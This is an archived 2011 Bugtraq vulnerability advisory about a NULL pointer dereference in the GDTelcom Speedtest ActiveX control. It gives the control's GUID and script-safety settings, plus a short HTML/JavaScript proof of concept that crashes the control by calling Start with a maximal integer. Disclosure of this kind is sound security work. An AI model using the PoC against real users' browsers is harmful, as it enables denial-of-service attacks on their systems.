lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201111011345.pA1DjrIR001664@sf01web2.securityfocus.com> Date: Tue, 1 Nov 2011 13:45:53 GMT From: demonalex@....com To: bugtraq@...urityfocus.com Subject: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll Remote Denial of Service Vulnerability Title: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll Remote Denial of Service Vulnerability Software: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0) Vulnerability Published :2011-10-15 Vulnerability Update Time :2011-09-10 Vendor: www.gdcn.com(No vendor response) Download: http://10000.gd.cn/speedtest/ActiveX.dll Impact: Median Bug Description: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0) NULL Pointer Dereference. Class Info: Class FTPDownLoad GUID: {348AA067-D6BC-4385-A833-08E308D35782} Number of Interfaces: 1 Default Interface: IFTPDownLoad RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False PoC: **************************************************************** <html> <body> <object classid='clsid:348AA067-D6BC-4385-A833-08E308D35782' id='target'></object> <script language='javascript'> var arg1=2147483647; target.Start(arg1); </script> </body> </html> **************************************************************** Credits: This vulnerability was discovered by demonalex (at) 163 (dot) com Pentester/Researcher Dark2S Security Team/PolyU.HK
Powered by blists - more mailing lists